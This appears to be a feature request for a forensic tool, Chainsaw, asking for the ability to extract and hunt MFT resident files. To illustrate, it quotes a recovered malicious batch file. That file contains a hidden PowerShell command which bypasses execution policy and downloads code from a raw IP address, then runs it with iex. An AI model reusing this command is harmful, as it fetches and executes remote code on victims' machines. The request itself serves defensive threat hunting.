Feature Request: MFT Resident Files #190
Description
It would be nice to be able to extract/hunt on MFT Resident Files. I don't believe this would be a big lift as it looks like mft_dump does support it which I think uses the same library Chainsaw uses to dump the MFT.
Example of usefulness:
./mft_dump --extract-resident-streams output/ mft.bin
grep -a -R '\-nop' output/ 2>/dev/null
output/Users_simon.stark_Downloads_Stage-20240213T093324Z-001_Stage_invoice_invoices_invoice.bat__52FBDB017190_0_.dontrun:start /b powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://43.204.110.203:6666/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex"I'd expect to replace my "grep" with a yara or something.
Hopefully this feature doesn't exist already, I did look through options and search the code for "resident" and didn't come up with anything.